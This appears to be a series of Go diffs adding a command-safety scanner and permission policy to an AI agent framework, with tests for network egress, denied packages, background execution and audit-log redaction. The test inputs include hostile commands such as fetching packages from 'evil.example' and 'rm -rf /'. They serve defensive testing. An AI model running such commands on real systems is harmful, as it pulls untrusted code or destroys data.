+	assertHasRule(t, report, "network_egress")
+}
+
+func TestNetworkEgress_NpmInstallSchemelessNonWhitelisted(t *testing.T) {
+	s := scannerWithPolicy(t, allowCommand("npm"))
+	report := scan(t, s, "npm install evil.example/pkg", BackendWorkspaceExec)
+	assertHasRule(t, report, "network_egress")
+}
+
+func TestNetworkEgress_SchemelessGoGetWhitelisted(t *testing.T) {
+	s := scannerWithPolicy(t, whitelistHost("evil.example"))
+	report := scan(t, s, "go get evil.example/pkg", BackendWorkspaceExec)
+	assertNoRule(t, report, "network_egress")
+}
+
+func TestNetworkEgress_WhitelistedSchemeLessHostAllowed(t *testing.T) {
+	s := scannerWithPolicy(t, func(p *Policy) {
+		allowCommand("curl")(p)
+		whitelistHost("evil.example")(p)
+	})
+	report := scan(t, s, "curl evil.example", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictAllow)
+}
+
+func TestNetworkEgress_BarePackageNameNotAHost(t *testing.T) {
+	s := scannerWithPolicy(t, allowCommand("pip"))
+	report := scan(t, s, "pip install requests", BackendWorkspaceExec)
+	assertNoRule(t, report, "network_egress")
+}

--- a/tool/safety/p0_bugs_test.go
+++ b/tool/safety/p0_bugs_test.go
@@ -1,0 +1,234 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+// This file contains red tests that reproduce the P0 issues called out
+// in the code review.  Each test must FAIL on the current implementation
+// and PASS after the corresponding fix.  They double as regression
+// tests once the bugs are fixed.
+//
+// P0-3 (Blocked field redundant with Decision) is a design issue rather
+// than a behavioral bug, so it is not covered here; a behavioural test
+// for it would be tautological.  Resolved by the Decision→Verdict
+// rename and removal of the Blocked field.
+
+func countRisksByRuleID(risks []Risk, ruleID string) int {
+	n := 0
+	for _, r := range risks {
+		if r.RuleID == ruleID {
+			n++
+		}
+	}
+	return n
+}
+
+// ----------------------------------------------------------------------
+// P0-1: policy.DefaultVerdict must be honored when no rule fires.
+//
+// Currently scanner.computeVerdict() always returns VerdictAllow when
+// no rule fires, ignoring policy.DefaultVerdict.  A user who sets
+// default_verdict: ask expects "no rule fired" to be sent for human
+// review, but gets allow.  The test below exercises both the ask and
+// deny variants of this bug.
+// ----------------------------------------------------------------------
+
+func TestP0_DefaultVerdictAsk_HonoredForSafeCommand(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictAsk
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	// "echo hello" is safe: shellsafe accepts echo (allowed), no rule
+	// should fire.  The policy asks for human review by default, so
+	// the final decision must be ask, not allow.
+	report := scan(t, s, "echo hello", BackendWorkspaceExec)
+
+	if report.Verdict != VerdictAsk {
+		t.Errorf("default_verdict=ask: got %s want %s; risks=%+v",
+			report.Verdict, VerdictAsk, report.Risks)
+	}
+}
+
+func TestP0_DefaultVerdictDeny_HonoredForSafeCommand(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictDeny
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "echo hello", BackendWorkspaceExec)
+
+	if report.Verdict != VerdictDeny {
+		t.Errorf("default_verdict=deny: got %s want %s; risks=%+v",
+			report.Verdict, VerdictDeny, report.Risks)
+	}
+}
+
+// ----------------------------------------------------------------------
+// P0-2: each RuleID must appear at most once in a report.
+//
+// When shellsafe rejects a command via the user-configured deny list,
+// scanner.go manually appends a Risk with RuleID="dangerous_command".
+// The dangerousCommandRule then ALSO fires (its Check has no awareness
+// of the prior rejection) and appends a second Risk with the same
+// RuleID.  This breaks the audit invariant that RuleID is unique and
+// produces duplicate OTel span attributes.
+// ----------------------------------------------------------------------
+
+func TestP0_NoDuplicateDangerousCommandRisk(t *testing.T) {
+	s := newTestScanner(t)
+
+	// "rm -rf /" hits both the shellsafe deny list and the
+	// dangerousCommandRule's rm -rf pattern.
+	report := scan(t, s, "rm -rf /", BackendWorkspaceExec)
+
+	n := countRisksByRuleID(report.Risks, "dangerous_command")
+	if n != 1 {
+		t.Errorf("expected exactly 1 dangerous_command risk, got %d: %+v",
+			n, report.Risks)
+	}
+}
+
+// ----------------------------------------------------------------------
+// P0-4: DependencyPolicy.DeniedPackages must be enforced.
+//
+// dependencyRule.Check currently only inspects AllowedManagers and
+// emits a medium risk for any install from an allowed manager.  The
+// DeniedPackages field is loaded from YAML and stored on the struct
+// but never read.  A user listing a package in denied_packages
+// expects the install to be denied, not merely reviewed.
+// ----------------------------------------------------------------------
+
+func TestP0_DeniedPackage_BlocksInstall(t *testing.T) {
+	policy := DefaultPolicy()
+	// Make shellsafe accept "pip" so the command reaches the rules.
+	policy.Commands.Allowed = []string{"pip"}
+	policy.DependencyPolicy.AllowedManagers = []string{"pip"}
+	policy.DependencyPolicy.DeniedPackages = []string{"malicious-pkg"}
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "pip install malicious-pkg", BackendWorkspaceExec)
+
+	if report.Verdict != VerdictDeny {
+		t.Errorf("denied package install must be denied: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+	if report.RiskLevel != RiskHigh && report.RiskLevel != RiskCritical {
+		t.Errorf("denied package install must escalate to high/critical: got %s",
+			report.RiskLevel)
+	}
+}
+
+// ----------------------------------------------------------------------
+// P0-4: ResourceLimits.AllowedSleepSeconds must be enforced.
+//
+// resourceAbuseRule stores maxSleep in its struct but never reads it
+// in Check().  A user setting allowed_sleep_seconds: 5 expects
+// "sleep 100" to be denied, but the rule never fires and the command
+// slips through when Commands.Allowed is empty (so shellsafe's allow
+// list check is inactive).
+// ----------------------------------------------------------------------
+
+func TestP0_AllowedSleepSeconds_BlocksLongSleep(t *testing.T) {
+	policy := DefaultPolicy()
+	// Disable shellsafe's allow/deny list so the command reaches the
+	// rules.  This isolates the resourceAbuseRule behaviour.
+	policy.Commands.Allowed = nil
+	policy.Commands.Denied = nil
+	policy.ResourceLimits.AllowedSleepSeconds = 5
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "sleep 100", BackendWorkspaceExec)
+
+	if report.Verdict != VerdictDeny {
+		t.Errorf("sleep 100 with allowed_sleep_seconds=5 must be denied: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+}
+
+// ----------------------------------------------------------------------
+// P0-5: AuditLogger must use the policy's SensitivePatterns, not the
+// defaults.
+//
+// NewAuditLogger currently hardcodes
+//     NewRedactor(DefaultPolicy().SensitivePatterns)
+// so a user who customises sensitive_patterns in YAML gets no
+// redaction for those patterns in the audit log.  This is a
+// data-leak path: secrets matching the user's own patterns can be
+// persisted to disk in cleartext.
+// ----------------------------------------------------------------------
+
+func TestP0_CustomSensitivePatterns_RedactedInAuditLog(t *testing.T) {
+	tmpDir := t.TempDir()
+	policyPath := filepath.Join(tmpDir, "policy.yaml")
+	auditPath := filepath.Join(tmpDir, "audit.jsonl")
+
+	const customSecret = "PROJECT_SPECIFIC_TOKEN_abc123def456"
+	yamlData := `version: "1.0"
+default_verdict: allow
+commands:
+  allowed: [echo]
+sensitive_patterns:
+  - "PROJECT_SPECIFIC_TOKEN_[a-z0-9]+"
+`
+	if err := os.WriteFile(policyPath, []byte(yamlData), 0o600); err != nil {
+		t.Fatalf("write policy: %v", err)
+	}
+
+	pp, err := NewPermissionPolicy(policyPath, auditPath)
+	if err != nil {
+		t.Fatalf("NewPermissionPolicy: %v", err)
+	}
+	defer pp.auditLogger.Close() //nolint:errcheck
+
+	// Drive the audit path directly: the bug is in the redactor
+	// selection, not in CheckToolPermission, so we bypass the
+	// framework request shape and call Log with a report that
+	// contains the custom secret.
+	report, err := pp.scanner.ScanCommand(context.Background(), &ScanRequest{
+		ToolName: "echo",
+		Command:  "echo " + customSecret,
+		Backend:  BackendWorkspaceExec,
+	})
+	if err != nil {
+		t.Fatalf("ScanCommand: %v", err)
+	}
+
+	if err := pp.auditLogger.Log(context.Background(), report, 0); err != nil {
+		t.Fatalf("Log: %v", err)
+	}
+
+	data, err := os.ReadFile(auditPath)
+	if err != nil {
+		t.Fatalf("ReadFile: %v", err)
+	}
+	if strings.Contains(string(data), customSecret) {
+		t.Errorf("audit log leaked custom secret %q; log content: %s",
+			customSecret, data)
+	}
+}

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -1,0 +1,183 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strings"
+	"time"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+
+	"go.opentelemetry.io/otel/attribute"
+	"go.opentelemetry.io/otel/trace"
+)
+
+// PermissionPolicy adapts a Scanner into a tool.PermissionPolicy so
+// it can be plugged into the framework's permission-check pipeline.
+//
+// When CheckToolPermission is called, the policy extracts the
+// command from the tool's arguments, runs the safety scanner,
+// records an audit event, sets OpenTelemetry span attributes, and
+// returns the decision as a PermissionDecision.
+type PermissionPolicy struct {
+	scanner     *Scanner
+	auditLogger *AuditLogger
+}
+
+// NewPermissionPolicy creates a PermissionPolicy from a policy file
+// path and an optional audit log path.  If auditLogPath is empty,
+// audit logging is disabled.
+func NewPermissionPolicy(policyPath, auditLogPath string) (*PermissionPolicy, error) {
+	policy, err := LoadPolicy(policyPath)
+	if err != nil {
+		return nil, err
+	}
+	scanner, err := NewScanner(policy)
+	if err != nil {
+		return nil, err
+	}
+	var auditLogger *AuditLogger
+	if auditLogPath != "" {
+		auditLogger, err = NewAuditLogger(auditLogPath, policy.SensitivePatterns)
+		if err != nil {
+			return nil, err
+		}
+	}
+	return &PermissionPolicy{scanner: scanner, auditLogger: auditLogger}, nil
+}
+
+// NewPermissionPolicyFromScanner creates a PermissionPolicy from an
+// existing Scanner and an optional audit logger.  This is useful for
+// tests and for callers that build the scanner programmatically.
+func NewPermissionPolicyFromScanner(scanner *Scanner, auditLogger *AuditLogger) *PermissionPolicy {
+	return &PermissionPolicy{scanner: scanner, auditLogger: auditLogger}
+}
+
+// CheckToolPermission implements tool.PermissionPolicy.
+func (p *PermissionPolicy) CheckToolPermission(ctx context.Context, req *tool.PermissionRequest) (tool.PermissionDecision, error) {
+	start := time.Now()
+
+	scanReq, err := p.extractScanRequest(req)
+	if err != nil {
+		// If we cannot extract the command, we cannot scan it.
+		// Fail safe by asking for review.
+		return tool.AskPermission(fmt.Sprintf("safety scan: %v", err)), nil
+	}
+
+	report, err := p.scanner.ScanCommand(ctx, scanReq)
+	if err != nil {
+		return tool.PermissionDecision{}, fmt.Errorf("safety scan: %w", err)
+	}
+
+	// Record audit event (best-effort).
+	if p.auditLogger != nil {
+		if auditErr := p.auditLogger.Log(ctx, report, time.Since(start)); auditErr != nil {
+			// Don't fail the permission check over audit logging.
+			_ = auditErr
+		}
+	}
+
+	// Record OTel span attributes (best-effort).
+	p.recordSpanAttributes(ctx, report)
+
+	return p.toPermissionDecision(report), nil
+}
+
+// extractScanRequest builds a ScanRequest from a PermissionRequest
+// by decoding the tool's JSON arguments.
+func (p *PermissionPolicy) extractScanRequest(req *tool.PermissionRequest) (*ScanRequest, error) {
+	var args map[string]any
+	if len(req.Arguments) > 0 {
+		if err := json.Unmarshal(req.Arguments, &args); err != nil {
+			return nil, fmt.Errorf("decode arguments: %w", err)
+		}
+	}
+
+	backend := inferBackend(req.ToolName)
+
+	switch backend {
+	case BackendCodeExec:
+		code, _ := args["code"].(string)
+		language, _ := args["language"].(string)
+		if code == "" {
+			return nil, fmt.Errorf("missing 'code' argument for tool %q", req.ToolName)
+		}
+		return &ScanRequest{
+			ToolName: req.ToolName,
+			Command:  code,
+			Backend:  backend,
+			Language: language,
+		}, nil
+	default:
+		command, _ := args["command"].(string)
+		if command == "" {
+			return nil, fmt.Errorf("missing 'command' argument for tool %q", req.ToolName)
+		}
+		return &ScanRequest{
+			ToolName: req.ToolName,
+			Command:  command,
+			Backend:  backend,
+		}, nil
+	}
+}
+
+// inferBackend maps a tool name to a safety Backend.
+func inferBackend(toolName string) Backend {
+	lower := strings.ToLower(toolName)
+	switch {
+	case strings.Contains(lower, "host"):
+		return BackendHostExec
+	case strings.Contains(lower, "code") || strings.Contains(lower, "execute"):
+		return BackendCodeExec
+	default:
+		return BackendWorkspaceExec
+	}
+}
+
+// toPermissionDecision converts a ScanReport into a PermissionDecision.
+func (p *PermissionPolicy) toPermissionDecision(report *ScanReport) tool.PermissionDecision {
+	var action tool.PermissionAction
+	switch report.Verdict {
+	case VerdictAllow:
+		action = tool.PermissionActionAllow
+	case VerdictDeny:
+		action = tool.PermissionActionDeny
+	case VerdictAsk:
+		action = tool.PermissionActionAsk
+	default:
+		action = tool.PermissionActionAsk
+	}
+	return tool.PermissionDecision{Action: action, Reason: report.Recommendation}
+}
+
+// recordSpanAttributes sets safety-related span attributes on the
+// current OTel span, if one is active and recording.
+func (p *PermissionPolicy) recordSpanAttributes(ctx context.Context, report *ScanReport) {
+	span := trace.SpanFromContext(ctx)
+	if !span.IsRecording() {
+		return
+	}
+	attrs := []attribute.KeyValue{
+		attribute.String("tool.safety.decision", string(report.Verdict)),
+		attribute.String("tool.safety.risk_level", string(report.RiskLevel)),
+		attribute.Int("tool.safety.risk_count", len(report.Risks)),
+		attribute.String("tool.safety.backend", string(report.Backend)),
+		attribute.Bool("tool.safety.blocked", report.Verdict == VerdictDeny),
+	}
+	for i, risk := range report.Risks {
+		attrs = append(attrs,
+			attribute.String(fmt.Sprintf("tool.safety.risk.%d.rule_id", i), risk.RuleID),
+			attribute.String(fmt.Sprintf("tool.safety.risk.%d.level", i), string(risk.Level)),
+		)
+	}
+	span.SetAttributes(attrs...)
+}

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -102,7 +102,7 @@ func (p *PermissionPolicy) extractScanRequest(req *tool.PermissionRequest) (*Sca
 		}
 	}
 
-	backend := inferBackend(req.ToolName)
+	backend := inferBackend(req)
 
 	switch backend {
 	case BackendCodeExec:
@@ -130,9 +130,23 @@ func (p *PermissionPolicy) extractScanRequest(req *tool.PermissionRequest) (*Sca
 	}
 }
 
-// inferBackend maps a tool name to a safety Backend.
-func inferBackend(toolName string) Backend {
-	lower := strings.ToLower(toolName)
+// BackendProvider is an optional interface that tools can implement to
+// explicitly declare their safety backend category.  When a tool
+// implements this interface, the scanner uses the declared backend
+// instead of inferring it from the tool name.
+type BackendProvider interface {
+	SafetyBackend() Backend
+}
+
+// inferBackend determines the safety Backend for a permission request.
+// It first checks whether the tool explicitly declares a backend via
+// the BackendProvider interface.  If not, it falls back to a
+// conservative name-based heuristic.
+func inferBackend(req *tool.PermissionRequest) Backend {
+	if bp, ok := req.Tool.(BackendProvider); ok {
+		return bp.SafetyBackend()
+	}
+	lower := strings.ToLower(req.ToolName)
 	switch {
 	case strings.Contains(lower, "host"):
 		return BackendHostExec

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -64,6 +64,16 @@ func NewPermissionPolicyFromScanner(scanner *Scanner, auditLogger *AuditLogger) 
 
 // CheckToolPermission implements tool.PermissionPolicy.
 func (p *PermissionPolicy) CheckToolPermission(ctx context.Context, req *tool.PermissionRequest) (tool.PermissionDecision, error) {
+	// Non-execution tools (file, search, MCP, ordinary tools) are not
+	// subject to command/code safety scanning.  When the resolved backend
+	// is BackendNone, short-circuit to allow instead of assuming the tool
+	// carries a "command" argument and producing an ask for a missing
+	// field.  Execution tools declare a concrete backend via
+	// BackendProvider, so they never reach this branch.
+	if inferBackend(req) == BackendNone {
+		return tool.AllowPermission(), nil
+	}
+
 	start := time.Now()
 
 	scanReq, err := p.extractScanRequest(req)
@@ -106,14 +116,35 @@ func (p *PermissionPolicy) extractScanRequest(req *tool.PermissionRequest) (*Sca
 
 	switch backend {
 	case BackendCodeExec:
-		code, _ := args["code"].(string)
-		language, _ := args["language"].(string)
-		if code == "" {
-			return nil, fmt.Errorf("missing 'code' argument for tool %q", req.ToolName)
+		// The model-visible execute_code tool carries source as a
+		// code_blocks array of {language, code} objects (see
+		// tool/codeexec/codeexec.go Declaration).  Parse that real
+		// shape instead of the legacy top-level "code" field, which
+		// the tool never actually sends.  Each block's source is
+		// included in the scan input so the code-execution rules
+		// inspect every block; a missing code_blocks argument fails
+		// safe to ask (handled by the caller) rather than allowing or
+		// denying blind.
+		blocks, err := parseCodeBlocks(args["code_blocks"])
+		if err != nil {
+			return nil, fmt.Errorf("tool %q: %w", req.ToolName, err)
+		}
+		var b strings.Builder
+		var language string
+		for i, blk := range blocks {
+			if i > 0 {
+				// Newline separator keeps blocks distinct and
+				// avoids spurious cross-block pattern matches.
+				b.WriteByte('\n')
+			}
+			b.WriteString(blk.Code)
+			if language == "" {
+				language = blk.Language
+			}
 		}
 		return &ScanRequest{
 			ToolName: req.ToolName,
-			Command:  code,
+			Command:  b.String(),
 			Backend:  backend,
 			Language: language,
 		}, nil
@@ -122,26 +153,130 @@ func (p *PermissionPolicy) extractScanRequest(req *tool.PermissionRequest) (*Sca
 		if command == "" {
 			return nil, fmt.Errorf("missing 'command' argument for tool %q", req.ToolName)
 		}
+		// The hostexec and workspaceexec argument shapes expose
+		// background as a separate JSON boolean.  Read it so the
+		// hostexec_risk rule can enforce allow_background on the
+		// structured flag rather than guessing from the command text.
+		background, _ := args["background"].(bool)
 		return &ScanRequest{
-			ToolName: req.ToolName,
-			Command:  command,
-			Backend:  backend,
+			ToolName:   req.ToolName,
+			Command:    command,
+			Backend:    backend,
+			Background: background,
 		}, nil
 	}
+}
+
+// codeBlock is the parsed form of one entry in the code_blocks argument.
+type codeBlock struct {
+	Language string
+	Code     string
+}
+
+// parseCodeBlocks extracts code blocks from the code_blocks argument of an
+// execute_code call.  It tolerates the same LLM quirks that
+// tool/codeexec.unmarshalCodeBlocks handles so the safety scanner sees the
+// same source the tool would execute: a normal array of {language, code}
+// objects, a single object in place of the array, or a double-encoded
+// JSON string containing either of those.
+//
+// A nil or empty code_blocks value yields an error so the caller fails safe
+// (asks for review) instead of scanning empty input.
+func parseCodeBlocks(raw any) ([]codeBlock, error) {
+	if raw == nil {
+		return nil, fmt.Errorf("missing 'code_blocks' argument")
+	}
+
+	// Unwrap a double-encoded JSON string the LLM emitted in place of
+	// the array.
+	if s, ok := raw.(string); ok {
+		var unwrapped any
+		if err := json.Unmarshal([]byte(s), &unwrapped); err != nil {
+			return nil, fmt.Errorf("decode code_blocks string: %w", err)
+		}
+		raw = unwrapped
+	}
+
+	switch v := raw.(type) {
+	case []any:
+		if len(v) == 0 {
+			return nil, fmt.Errorf("'code_blocks' is empty")
+		}
+		blocks := make([]codeBlock, 0, len(v))
+		for i, item := range v {
+			blk, err := decodeCodeBlock(item)
+			if err != nil {
+				return nil, fmt.Errorf("code_blocks[%d]: %w", i, err)
+			}
+			blocks = append(blocks, blk)
+		}
+		return blocks, nil
+	case map[string]any:
+		// Single object in place of the array — tolerate the shape.
+		blk, err := decodeCodeBlock(v)
+		if err != nil {
+			return nil, fmt.Errorf("code_blocks: %w", err)
+		}
+		return []codeBlock{blk}, nil
+	default:
+		return nil, fmt.Errorf("code_blocks: expected array, object, or string, got %T", raw)
+	}
+}
+
+// decodeCodeBlock decodes one {language, code} object.  An empty code field
+// is rejected so a malformed block fails safe rather than scanning nothing.
+func decodeCodeBlock(item any) (codeBlock, error) {
+	m, ok := item.(map[string]any)
+	if !ok {
+		return codeBlock{}, fmt.Errorf("expected object, got %T", item)
+	}
+	language, _ := m["language"].(string)
+	code, _ := m["code"].(string)
+	if code == "" {
+		return codeBlock{}, fmt.Errorf("missing 'code' field")
+	}
+	return codeBlock{Language: language, Code: code}, nil
 }
 
 // BackendProvider is an optional interface that tools can implement to
 // explicitly declare their safety backend category.  When a tool
 // implements this interface, the scanner uses the declared backend
 // instead of inferring it from the tool name.
+//
+// The known execution tools declare their backend via this interface:
+//
+//   - tool/hostexec's exec_command tool   -> BackendHostExec
+//   - tool/workspaceexec's workspace_exec  -> BackendWorkspaceExec
+//   - tool/codeexec's execute_code tool    -> BackendCodeExec
+//
+// Tools that do not implement BackendProvider fall back to the
+// name-based heuristic in inferBackend, which is a last-resort path
+// and must not be relied on for tools that can declare a backend.
 type BackendProvider interface {
 	SafetyBackend() Backend
 }
 
 // inferBackend determines the safety Backend for a permission request.
-// It first checks whether the tool explicitly declares a backend via
-// the BackendProvider interface.  If not, it falls back to a
-// conservative name-based heuristic.
+//
+// When the tool implements BackendProvider, the declared backend is
+// used and the tool name is not consulted.  This is the only path used
+// by the known execution tools (hostexec, workspaceexec, codeexec),
+// which each declare their backend; the name-based heuristic below is
+// unreachable for them.
+//
+// For tools that do not declare a backend, a conservative name-based
+// heuristic is used as a last resort.  It maps tool names that clearly
+// reference an execution surface ("host", "code", "execute") to the
+// corresponding exec backend.  Any name that does not match an exec
+// signal resolves to BackendNone, marking the tool as a non-execution
+// tool; CheckToolPermission short-circuits such tools to allow instead
+// of demanding a "command" argument they do not carry.  This keeps file,
+// search, MCP, and other ordinary tools from being intercepted by the
+// command/code safety scanner.
+//
+// The heuristic is retained for backward compatibility with ad-hoc tools
+// that predate BackendProvider; new execution tools should implement
+// BackendProvider instead of relying on this heuristic.
 func inferBackend(req *tool.PermissionRequest) Backend {
 	if bp, ok := req.Tool.(BackendProvider); ok {
 		return bp.SafetyBackend()
@@ -153,7 +288,7 @@ func inferBackend(req *tool.PermissionRequest) Backend {
 	case strings.Contains(lower, "code") || strings.Contains(lower, "execute"):
 		return BackendCodeExec
 	default:
-		return BackendWorkspaceExec
+		return BackendNone
 	}
 }
 

--- a/tool/safety/permission_background_test.go
+++ b/tool/safety/permission_background_test.go
@@ -1,0 +1,166 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"testing"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+// These tests guard issue 07: the hostexec_risk rule must enforce the
+// structured JSON "background" boolean carried by the hostexec and
+// workspaceexec argument shapes, not a textual search for "&" / "nohup"
+// markers in the command string.  A request that sets "background": true
+// with a command that happens to contain no background marker must still
+// be denied when allow_background is false — otherwise the guard can be
+// bypassed by "background": true plus a clean command string.
+//
+// The seam under test is the public PermissionPolicy.CheckToolPermission
+// method, driven with the same fakeBackendTool used by the other
+// permission tests to declare a backend without spinning up a real exec
+// tool.
+//
+// Chosen semantics:
+//
+//   - The structured "background" boolean is authoritative.  When it is
+//     true and the backend's allow_background is false, the scan is denied
+//     regardless of whether the command text contains a background marker.
+//   - The textual background markers ("&", "nohup", "disown", "setsid")
+//     remain a fallback signal for the direct ScanCommand path where no
+//     structured argument is available.  A command that textually requests
+//     background execution is denied even when the structured flag is
+//     absent or false.
+
+// newBackgroundPolicy builds a policy with allow_background disabled (and
+// require_human_review disabled so the only risk under test is the
+// background risk) for the given backend.
+func newBackgroundPolicy(t *testing.T, backend Backend) *Policy {
+	t.Helper()
+	p := DefaultPolicy()
+	p.DefaultVerdict = VerdictAllow
+	switch backend {
+	case BackendHostExec:
+		p.BackendPolicies.HostExec.AllowBackground = false
+		p.BackendPolicies.HostExec.RequireHumanReview = false
+	case BackendWorkspaceExec:
+		p.BackendPolicies.WorkspaceExec.AllowBackground = false
+		p.BackendPolicies.WorkspaceExec.RequireHumanReview = false
+	default:
+		t.Fatalf("unsupported backend for background policy: %q", backend)
+	}
+	return p
+}
+
+// checkBackgroundTool drives CheckToolPermission for a fake tool that
+// declares backend with the given JSON arguments, returning the decision.
+func checkBackgroundTool(t *testing.T, backend Backend, args string) tool.PermissionDecision {
+	t.Helper()
+	pp := NewPermissionPolicyFromScanner(mustScanner(t, newBackgroundPolicy(t, backend)), nil)
+	req := &tool.PermissionRequest{
+		Tool:      &fakeBackendTool{declared: backend, name: "exec_command"},
+		ToolName:  "exec_command",
+		Arguments: []byte(args),
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	return dec
+}
+
+// mustScanner constructs a Scanner from p, failing the test on error.
+func mustScanner(t *testing.T, p *Policy) *Scanner {
+	t.Helper()
+	s, err := NewScanner(p)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	return s
+}
+
+// TestHostExecRisk_BackgroundTrue_NoTextualMarker_Denied is the core
+// regression for issue 07.  A request carrying "background": true whose
+// command text contains no "&" / "nohup" marker must be denied when
+// allow_background is false.  Before the fix, hostexec_risk searched only
+// the command text, so this request slipped past allow_background: false.
+func TestHostExecRisk_BackgroundTrue_NoTextualMarker_Denied(t *testing.T) {
+	// The command is a completely benign shell command with no background
+	// marker.  Only the structured "background": true flag marks it as a
+	// background request, which is exactly the bypass this issue closes.
+	dec := checkBackgroundTool(t, BackendHostExec, `{"command":"echo hello","background":true}`)
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("hostexec background:true (clean command): got action %q want %q",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}
+
+// TestHostExecRisk_BackgroundTrue_WorkspaceExec_Denied proves the same
+// bypass fix applies to the workspaceexec backend, which also exposes
+// background as a structured boolean and is subject to the same
+// hostexec_risk rule.
+func TestHostExecRisk_BackgroundTrue_WorkspaceExec_Denied(t *testing.T) {
+	dec := checkBackgroundTool(t, BackendWorkspaceExec, `{"command":"echo hello","background":true}`)
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("workspaceexec background:true (clean command): got action %q want %q",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}
+
+// TestHostExecRisk_BackgroundFalse_CommandWithAmpersand_Denied documents
+// the chosen semantics for the inverse case: a request with background:false
+// (or absent) whose command text contains a background operator "&" is still
+// denied.  The structured flag does not excuse an explicit textual background
+// operator; shellsafe also rejects "&" as a structural parse error.  This is
+// strictly more conservative than the bypass being fixed.
+func TestHostExecRisk_BackgroundFalse_CommandWithAmpersand_Denied(t *testing.T) {
+	dec := checkBackgroundTool(t, BackendHostExec, `{"command":"echo hello &","background":false}`)
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("hostexec background:false + '&' marker: got action %q want %q",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}
+
+// TestHostExecRisk_BackgroundAbsent_CommandWithNohup_Denied confirms the
+// textual fallback still works when the structured flag is absent: a command
+// using "nohup" is denied even though no "background" argument was supplied.
+func TestHostExecRisk_BackgroundAbsent_CommandWithNohup_Denied(t *testing.T) {
+	dec := checkBackgroundTool(t, BackendHostExec, `{"command":"nohup echo hello"}`)
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("hostexec absent background + 'nohup' marker: got action %q want %q",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}
+
+// TestHostExecRisk_BackgroundTrue_AllowBackgroundAllows proves that when
+// allow_background is true, a background:true request is not denied by the
+// hostexec_risk background check.  The command text is benign and no other
+// rule fires, so the result is allow.
+func TestHostExecRisk_BackgroundTrue_AllowBackgroundAllows(t *testing.T) {
+	p := DefaultPolicy()
+	p.DefaultVerdict = VerdictAllow
+	p.BackendPolicies.HostExec.AllowBackground = true
+	p.BackendPolicies.HostExec.RequireHumanReview = false
+	pp := NewPermissionPolicyFromScanner(mustScanner(t, p), nil)
+
+	req := &tool.PermissionRequest{
+		Tool:      &fakeBackendTool{declared: BackendHostExec, name: "exec_command"},
+		ToolName:  "exec_command",
+		Arguments: []byte(`{"command":"echo hello","background":true}`),
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	if dec.Action != tool.PermissionActionAllow {
+		t.Errorf("hostexec background:true with allow_background=true: got action %q want %q",
+			dec.Action, tool.PermissionActionAllow)
+	}
+}

--- a/tool/safety/permission_background_test.go
+++ b/tool/safety/permission_background_test.go
@@ -164,3 +164,31 @@ func TestHostExecRisk_BackgroundTrue_AllowBackgroundAllows(t *testing.T) {
 			dec.Action, tool.PermissionActionAllow)
 	}
 }
+
+// TestHostExecRisk_BackgroundTrue_DeniedUnderReviewRequiredPolicy is the
+// regression for a review finding on issue 07: hostExecRiskRule checked
+// RequireHumanReview before the structured background flag, so under the
+// default policy (HostExec.RequireHumanReview=true) a background:true
+// request with a clean command text was only asked for review, never
+// denied.  allow_background: false was therefore unenforceable out of the
+// box.  The background deny must take precedence over the softer ask.
+func TestHostExecRisk_BackgroundTrue_DeniedUnderReviewRequiredPolicy(t *testing.T) {
+	// The default policy keeps HostExec.RequireHumanReview=true and
+	// AllowBackground=false, which is the configuration in which the
+	// ordering bug surfaced.
+	pp := NewPermissionPolicyFromScanner(mustScanner(t, DefaultPolicy()), nil)
+
+	req := &tool.PermissionRequest{
+		Tool:      &fakeBackendTool{declared: BackendHostExec, name: "exec_command"},
+		ToolName:  "exec_command",
+		Arguments: []byte(`{"command":"echo hello","background":true}`),
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("hostexec background:true under default policy: got action %q want %q",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}

